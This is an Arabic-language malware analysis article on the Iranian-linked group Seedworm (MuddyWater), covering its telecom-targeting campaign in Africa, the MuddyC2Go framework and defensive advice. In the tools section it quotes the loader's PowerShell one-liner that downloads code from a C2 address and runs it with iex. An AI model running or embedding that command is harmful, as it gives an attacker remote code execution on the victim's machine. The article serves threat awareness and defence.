مع تطوّر العصر الرقمي، تتطور أساليب الهجمات الإلكترونية لتأخذ أشكالاً أكثر تعقيداً وتطوّراً. في هذا السياق، تبرز مجموعة “Seedworm”، المعروفة أيضاً بتسميات”Muddywater”، كلاعب رئيسي في ساحة الهجمات الإلكترونية المتقدمة.

مجموعة “Seedworm” أو ما تُدعى “Muddywater”

هي مجموعة قراصنة إلكترونية إيرانية متطورة، يُعتقد أنها مرتبطة بوزارة الاستخبارات والأمن الإيرانية (MOIS). 

تنشط المجموعة منذ عام 2017، وقد استهدفت منظماتٍ في العديد من البلدان، بما في ذلك الولايات المتحدة والمملكة العربية السعودية وإسرائيل.

تهدف هجمات “Seedworm” بشكل أساسي إلى التّجسس على المعلومات الحساسة، مثل بيانات الموظفين والعملاء و التقنيات والخطط العسكرية. تستخدم المجموعةُ مجموعةً متنوعة من الأدوات والأساليب في هجماتها، بما في ذلك التصيّد الاحتيالي واستغلال الثغرات الأمنية وبرامج الفدية.

من أبرز هجمات “Seedworm” أو ماتُدعى “Muddywater”:

• في عام 2017، استهدفت المجموعة منظمات في الولايات المتحدة والمملكة العربية السعودية وإسرائيل. استخدمت المجموعة في هذه الهجمات بريداً إلكترونياً تصيدًا احتيالياً يحتوي على ملفٍّ مشفر. عند فتح الملف، تم تثبيت برنامج تجسس على الجهاز المصاب.
• في عام 2020، استهدفت المجموعة منظمات في الشرق الأوسط. استخدمت المجموعة في هذه الهجمات مجموعةً متنوعة من الأدوات، بما في ذلك برنامج “Powermud backdoor” وبرنامج “Pow Goop downloader”.
• في عام 2023، استهدفت المجموعة منظمات في أفريقيا وشركات اتصال. استخدمت المجموعة في هذه الهجمات برنامج “MuddyC2Go framework” وبرنامج”keylogger” مخصص.

تمثل الحملة الأخيرة لـ “Seedworm” استراتيجية متطورة في استهداف مؤسسات الاتصالات في شمال وشرق أفريقيا. 

يُعزى النجاح المستمر لهذه المجموعة إلى تنوع أدواتها وقدرتها على التكيف مع التحديات الأمنية المتزايدة. 

في هذا السياق، يتمحور هذا التحليل حول الابتكارات الأخيرة لـ “Seedworm” مع التركيز على إطار العمل”MuddyC2Go” والتحديات الأمنية التي يطرحها. 

سنستعرض أيضًا كيفية تعامل “Seedworm” مع المؤسسات في شمال وشرق أفريقيا، ونلقي نظرة على الاستراتيجيات الأمنية الملائمة للتصدي لتلك التحديات المتقدمة.

أهداف الهجوم:
كانت الأهداف المحتملة للهجوم هي منظمات في شمال وشرق أفريقيا ذات أهمية استراتيجية أو اقتصادية. تضمنت هذه المنظمات ما يلي:

• الحكومات
• الشركات العسكرية
• شركات النفط والغاز
• شركات التكنولوجيا

آلية الهجوم:

بدأت آلية الهجوم برسالة بريد إلكتروني تصيد احتيالي. كانت هذه الرسالة مزيفة تدعي أنها من مصدر موثوق، مثل شركة تكنولوجيا أو حكومة. احتوت الرسالة على رابط أو مرفق يحتوي على برنامج خبيث.

عند فتح الرابط أو المرفق، تم تثبيت برنامج خبيث على جهاز الضحية. كان هذا البرنامج خبيثًا من نوع “MuddyC2Go” وهو إطار عمل تحكم وإدارة عن بعد (C2) يسمح للقراصنة بالتحكم في الجهاز المصاب عن بعد.

بمجرد تثبيت برنامج “MuddyC2Go” تمكن القراصنة من الوصول إلى جهاز الضحية وتنفيذ مجموعة متنوعة من الإجراءات، بما في ذلك:

• جمع المعلومات من جهاز الضحية، مثل بيانات الموظفين وبيانات العملاء وبيانات التكنولوجيا.
• تنفيذ هجمات أخرى، مثل برامج الفدية أو الهجمات المضرة بالبنى التحتية.

الأدوات المستخدمة:

ربما يكون الجزء الأكثر إثارة للاهتمام في مجموعة الأدوات المستخدمة في هذا النشاط هو وجود مشغل “MuddyC2Go” والذي تم تحميله بواسطة jabswitch.exe.

تقرأ البرامج الضارة عنوان URL لـ C&C من قيمة تسجيل Windows “End” المخزنة داخل المفتاح “HKLM\SYSTEM\CurrentControlSet\Services\Tcpip”. تتم قراءة مسار URL من قيمة “الحالة” في نفس المفتاح المذكور أعلاه.

وأخيرًا، ينفذ مشغل “MuddyC2Go” أمر PowerShell التالي للاتصال بخادم القيادة والسيطرة الخاص به وتنفيذ كود PowerShell المستلم:

powershell.exe -c $uri ='{C2_URI}’;$response = Invoke-WebRequest -UseBasicParsing -Uri $uri -Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;

تمت الكتابة عن إطار عمل “MuddyC2Go” علنًا لأول مرة في مدونة نشرها باحثو Deep Instinct في 8 نوفمبر 2023. وقد وثقت تلك المدونة استخدامه في الهجمات على منظمات في دول الشرق الأوسط. قال الباحثون إن إطار العمل ربما تم استخدامه بواسطة “Seedworm” منذ عام 2020. وقالوا أيضًا إن إطار العمل، المكتوب بلغة Go، قد حل محل البنية التحتية PhonyC2 C&C السابقة لـ “Seedworm”. يبدو أن هذا الاستبدال قد حدث بعد تسريب كود مصدر PhonyC2 في وقت سابق من عام 2023.

القدرات الكاملة لـ “MuddyC2Go” ليست معروفة بعد، ولكن الملف القابل للتنفيذ يحتوي على برنامج PowerShell النصي المضمن الذي يتصل تلقائيًا بخادم القيادة والسيطرة الخاص بـ “Seedworm” مما يلغي الحاجة إلى التنفيذ اليدوي من قبل المشغل ويمنح المهاجمين الوصول عن بعد إلى الجهاز الضحية.

ومن الأدوات الأخرى الجديرة بالملاحظة المستخدمة في هذا النشاط SimpleHelp، وهي أداة شرعية للتحكم في الأجهزة وإدارتها عن بعد، من أجل استمرار العمل على الأجهزة الضحية. يُعتقد أن SimpleHelp قد تم استخدامه في الهجمات التي نفذتها “Seedworm” منذ يوليو 2022 على الأقل.

بالإضافة إلى التصيد الاحتيالي وبرامج الفدية وإطار عمل “MuddyC2Go” استخدمت مجموعة “Seedworm” أيضًا مجموعة متنوعة من الأدوات الأخرى، بما في ذلك:

• برنامج “SimpleHelp”، وهو أداة شرعية للتحكم عن بعد في الأجهزة.
• برنامج “Venom Proxy”، وهو أداة شرعية لتجاوز أنظمة التحكم في الوصول إلى الشبكة (NAC).
• برنامج “keylogger” مخصص يسجل كل ما يكتبه المستخدم على لوحة المفاتيح الخاصة به.

النتائج:

الهجمات التي استهدفت شركات الاتصال من قبل مجموعة “Seedworm” قد تسببت في العديد من الأضرار والتأثيرات السلبية.
الاضطرارات يمكن أن تكون متنوعة وتعتمد على طبيعة البيانات والأنظمة التي تم استهدافها، ولكن يمكن تلخيص بعض الآثار المحتملة:

• تمكنت المجموعة من الوصول إلى عدد من المؤسسات في غرب وشمال وشرق أفريقيا.
• تمكن القراصنة من جمع معلومات حساسة من هذه المؤسسات، بما في ذلك بيانات الموظفين وبيانات العملاء وبيانات التكنولوجيا.
• استخدم القراصنة هذه المعلومات لشن هجمات أخرى، مثل برامج الفدية.

التوصيات:

بناءً على نتائج الهجوم، قدمت شركة الأمن السيبراني CrowdStrike مجموعة من التوصيات للحماية من هجمات “Seedworm” بما في ذلك:

• تحديث برامج الأمان على جهاز الكمبيوتر الخاص بك بانتظام.
• تثبيت جدار حماية على جهاز الكمبيوتر الخاص بك.
• توخي الحذر من البريد الإلكتروني التصيد الاحتيالي.
• لا تفتح الملفات أو الروابط من مصادر غير معروفة.
• استخدام كلمات مرور قوية ومتنوعة.

بالإضافة إلى هذه النصائح، من المهم أيضًا أن تكون على دراية بالتهديدات السيبرانية الحالية وأن تكون على استعداد للرد عليها. يمكنك القيام بذلك من خلال قراءة الأخبار المتعلقة بالأمن السيبراني ومتابعة أفضل الممارسات الأمنية.

توصيات إضافية:

بالإضافة إلى التوصيات المذكورة أعلاه، يمكن للمؤسسات اتخاذ خطوات إضافية للحماية من هجمات “Seedworm” مثل:

• استخدام تقنية أمان متقدمة، مثل الذكاء الاصطناعي وتعلم الآلة، لاكتشاف ومنع الهجمات.
• تدريب الموظفين على كيفية التعرف على البريد الإلكتروني التصيد الاحتيالي وهجمات أخرى.
• إنشاء خطط لاستجابة الحوادث لمعالجة الهجمات إذا حدثت.

من خلال اتخاذ هذه الخطوات، يمكن للمؤسسات تقليل خطر وقوع ضحية لهجمات “Seedworm”.

الخاتمة

في ختام هذه الورقة التحليلية، يبرز توجيه “Seedworm” نحو استهداف شركات الاتصال في شمال وشرق أفريقيا تحديات أمان جديدة. يظهر الهجوم الأخير بأن المجموعة لا تزال تتبنى أساليب تقنية متطورة مثل إطار “MuddyC2Go” وبرنامج Keylogger المخصص.

 يشير النشاط المستمر لـ “Seedworm” إلى حاجة المؤسسات إلى فحص استراتيجياتها الأمانية وتعزيز إجراءاتها للحماية من هذا النوع من التهديدات السيبرانية.

مع الاستمرار في تطوّر تكتيكات “Seedworm” وقدراتها التكنولوجية، يصبح الوعي بالتهديدات السيبرانية والتحضير لمواجهتها أمرًا أساسيًا للمنظمات المعنية. يجب على الشركات تعزيز قدراتها في اكتشاف واستجابة الحوادث وتبني أفضل ممارسات أمان الشبكات لضمان استمرار أعمالها وحماية بياناتها وسمعتها في وجه هذه التحديات المتزايدة في عالم التهديدات السيبرانية.

كاتب المقال يحيى الصبيح ينصح بقراءة ...

“أنونيموس السودان”.. هل تستخدم موسكو “قضايا الإسلام” غطاء لهجماتها السيبرانية؟